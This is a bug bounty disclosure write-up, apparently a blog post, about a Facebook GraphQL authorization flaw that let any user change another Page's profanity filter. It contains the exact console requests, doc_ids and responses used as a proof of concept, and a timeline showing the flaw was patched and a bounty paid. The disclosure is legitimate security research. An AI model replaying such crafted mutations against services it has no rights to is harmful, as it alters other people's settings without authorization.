Facebook seems to have recently introduced an option to change the filter for profane comments. It’s possible as a non admin to change this for any page

1. Login as AdminOne

2. Observe the response to the following request that can be done in console

new AsyncRequest('/api/graphql').setData({doc_id: 3152386011505033,variables:"{videoID: 1}"}).send()

{"data":{"video":{"id":"1","broadcast_blocked_users":[],"broadcast_suspended_users_info":{"edges":[]},"broadcast_id":null,"owner":{"__typename":"Page","__isProfile":"Page","id":"113702895386410","profanity_filter_id":"FILTER_OFF"}}},"extensions":{"is_final":true,"live_query":{"response_digest":"1","priming_token":"1"}}}

This requests the video and the current profanity filter. Trying to request the field manually (?q=node(ID)) seems to block me with code: 1675036 as Facebook has blocked arbitrary GraphQL requests globally (May 2020).

3. Login as AttackerOne

4. Execute the following request under the console in AttackerOne session

new AsyncRequest('/api/graphql').setData({doc_id:2775555902540880,variables:"{input:{actor_id: 2, client_mutation_id:0,page_id: 113702895386410,profanity_setting:'FILTER_MEDIUM'}}"}).send()

5. Recheck the query from 2 as AdminOne

{"data":{"video":{"id":"1","broadcast_blocked_users":[],"broadcast_suspended_users_info":{"edges":[]},"broadcast_id":null,"owner":{"__typename":"Page","__isProfile":"Page","id":"113702895386410","profanity_filter_id":"FILTER_MEDIUM"}}},"extensions":{"is_final":true,"live_query":{"response_digest":"1","priming_token":"1"}}}

The filter was changed.

Impact (A verbatim explanation of the bounty by Facebook):

it’s possible to set the profanity filter for any page via graphql.

Timeline

May 12, 2020 – Report sent
May 12, 2020 – Confirmation of submission by Facebook
May 15, 2020 – Confirmation of patch by Facebook
Jun 4, 2020 – $750 Bounty awarded by Facebook